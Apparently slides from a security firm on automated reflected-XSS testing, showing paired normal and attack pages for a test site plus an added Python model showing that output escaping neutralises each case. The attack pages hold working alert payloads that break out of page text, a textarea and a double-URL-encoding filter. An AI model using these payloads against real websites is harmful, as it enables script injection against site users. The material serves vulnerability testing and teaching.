18. Execution example ①: normal case
MBSD
<!doctype html><html><head><title>Full Javascript Injection (full.1)</title></head><body>
Hello!<BR>
The value of cgi parameter "in" is: xxx
</body></html>
http://xxx.jp/full1?in=xxx
Output location: outside HTML tags
Input restriction: none
19. Execution example ①: attack case
<!doctype html><html><head><title>Full Javascript Injection (full.1)</title></head><body>
Hello!<BR>
The value of cgi parameter "in" is: M75uhmid='' mulenpedistor<script>alert(3122);</script>HFZ4R
</body></html>
http://xxx.jp/full1?in=M75uhmid='' mulenpedistor<script>alert(3122);</script>HFZ4Rxx
Number of attempts: 1
20. Execution example ②: normal case
<!doctype html><html><head><title>Reflected XSS in textarea (textarea1)</title></head><body>
<H2>Textarea injection test</H2>
This test requires a closing textarea tag to break out of the field context and
trigger a subsequent exploit.
<p>
<FORM>
<textarea name="in" rows="5" cols="60">xxx</textarea>
<p>
<INPUT type="Submit">
・・・
http://xxx.jp/textarea1?in=xxx
Output location: inside a textarea element
Input restriction: none
21. Execution example ②: attack case
<!doctype html><html><head><title>Reflected XSS in textarea (textarea1)</title></head><body>
<H2>Textarea injection test</H2>
This test requires a closing textarea tag to break out of the field context and
trigger a subsequent exploit.
<p>
<FORM>
<textarea name="in" rows="5" cols="60">V9vyQ</textarea><script>alert(3122);</script>zU9qL</textarea>
<p>
<INPUT type="Submit">
http://xxx.jp/textarea1?in=V9vyQ</textarea><script>alert(3122);</script>zU9qL
Number of attempts: 1
22. Execution example ③: normal case
<!doctype html><html><head><title>Double-Encoded tags injection (doubq.1)</title></head><body>
Hello!<BR>
The value of the cgi parameter "in" is: xxx
<p>
This test echos unencoded version of double-encoded tags.
</body></html>
http://xxx.jp/doubq1?in=xxx
Output location: outside HTML tags
Input restriction: yes (double decoding)
23. Execution example ③: attack case
<!doctype html><html><head><title>Double-Encoded tags injection (doubq.1)</title></head><body>
Hello!<BR>
The value of the cgi parameter "in" is: ueGD9ahdtin='' tligk=''><<script>alert(3122);</script>bK12w
<p>
This test echos unencoded version of double-encoded tags.
</body></html>
http://xxx.jp/doubq1?in=ueGD9ahdtin%253D%2527%2527%2520tligk%253D%2527%2527%253E%253C%253Cscript%253Ealert%25283122%2529%253B%253C/script%253EbK12w
Number of attempts: 5
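
The three cases above, replayed in a small model as an added example (not from the original slides): each value is placed in its output location as-is and again with HTML escaping applied at output time. The renderer functions and the assumption that doubq1 URL-decodes the value twice before echoing it are illustrative, not the test site's actual code.

```python
import html
from urllib.parse import unquote

# Query values taken from the three attack-case URLs above.
FULL1 = "M75uhmid='' mulenpedistor<script>alert(3122);</script>HFZ4R"
TEXTAREA1 = "V9vyQ</textarea><script>alert(3122);</script>zU9qL"
DOUBQ1_RAW = ("ueGD9ahdtin%253D%2527%2527%2520tligk%253D%2527%2527%253E%253C"
              "%253Cscript%253Ealert%25283122%2529%253B%253C/script%253EbK12w")

def decode_once(raw):
    # What a check placed after the first URL decode would see.
    return unquote(raw)

def decode_twice(raw):
    # Assumed model of doubq1: decoded once by the web server and a
    # second time by the application before the value is echoed.
    return unquote(unquote(raw))

def render_body(value, escape):
    # Output location: outside HTML tags (full1, doubq1).
    out = html.escape(value, quote=True) if escape else value
    return 'The value of cgi parameter "in" is: ' + out

def render_textarea(value, escape):
    # Output location: between <textarea> and </textarea> (textarea1).
    out = html.escape(value, quote=True) if escape else value
    return '<textarea name="in" rows="5" cols="60">' + out + '</textarea>'

def has_live_script(page):
    # Crude reflection check: does a literal <script> tag reach the page?
    return "<script>" in page.lower()

def run_cases():
    cases = {
        "full1": (render_body, FULL1),
        "textarea1": (render_textarea, TEXTAREA1),
        "doubq1": (render_body, decode_twice(DOUBQ1_RAW)),
    }
    # name -> (live script when echoed as-is, live script when escaped)
    return {name: (has_live_script(fn(v, False)), has_live_script(fn(v, True)))
            for name, (fn, v) in cases.items()}

if __name__ == "__main__":
    print("doubq1 after one decode contains '<':", "<" in decode_once(DOUBQ1_RAW))
    for name, (raw, escaped) in run_cases().items():
        print(f"{name}: live <script> as-is={raw} escaped={escaped}")
```

Escaping at the point of output handles all three cases, including the double-decoded one, because it acts on the final value rather than on an intermediate decoding stage.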